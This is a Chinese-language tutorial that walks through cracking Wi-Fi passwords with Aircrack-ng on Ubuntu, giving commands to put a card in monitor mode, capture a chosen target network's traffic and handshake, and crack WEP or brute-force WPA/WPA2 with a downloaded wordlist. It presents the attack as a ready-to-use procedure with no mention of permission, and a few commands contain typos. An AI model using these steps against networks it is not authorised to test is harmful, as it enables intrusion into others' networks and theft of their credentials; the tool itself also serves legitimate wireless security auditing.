Aircrack-ng无线破解总结

测试环境在linux平台下，我用的是ubuntu环境。ubuntu安装可以直接用sudo apt-get install aircrack-ng
linux应该可以用yum -y install aircrack-ng 来安装，如果下载它的安装包，没有fangqian的话，非常慢。

------------------------------------------------------------------------------------

方法:

1.确保你的无线是打开的:ifconfig看是否有wlan0或别的无线适配器已经启动,如果没有,后面的步骤都执行不了

　　可以先用ifconfig -a看是否有无线适配器,再用ifconfig wlan0 up命令启动无线适配器(wlan0为ifconfig -a中查找到的无线适配器名称)

2.激活网卡为监听模式:

sudo airmon-ng start wlan0

3.查看无线网络,开始抓取无线数据包

sudo airodump-ng mon0

注意：这里的mon0是你的wlan开始监听之后的别名，一般可能会出现的问题是：

rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network

如果出现这个问题，按照这个来解决

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

sudo airodump-ng wlan0

或者：

airmon-ng check kill
airmon-ng start <interface>
airodump-ng wlan0mon

不过网络管理给关掉了

sudo servicenetwork-manager stop # 停止 nm服务

udo servicenetwork-manager start # 开启 nm服务

如果一切没有问题====》

这时就会显示你当前可以搜索到的无线信号,PWR是信号值,数值越大表示信号越强,ESSID就是这个信号的名称.ENC为加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)

找到一个你希望破解的essid

4.确定目标后

sudo airodump-ng -c 6 --bssid target's MAC -w file mon0

-c 6是指这个信号的频道 ，就是CH那个频道

target's MAC 是你想要破解的MAC地址

file 是aircrack-ng 跟目标地址握手后保存的数据

5.收到足够的包之后(即data),开始破解

sudo aircrack-ng file-01.cap

file-01.cap 就是握手后保存的数据

如果是wep类型的密码,在收到足够多的包之后(1w)可以直接破解

如果是wpa/wpa2类型的加密方式,则必须收到握手包之后才能开始暴力破解并且需要使用密码文件(给出一个地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密码足够复杂的话这样的密码文件也是不够的,需要自己去下更复杂的加密文件

sudo aircrack-ng -w dic file-01.cap

破解成功就能拿到密码了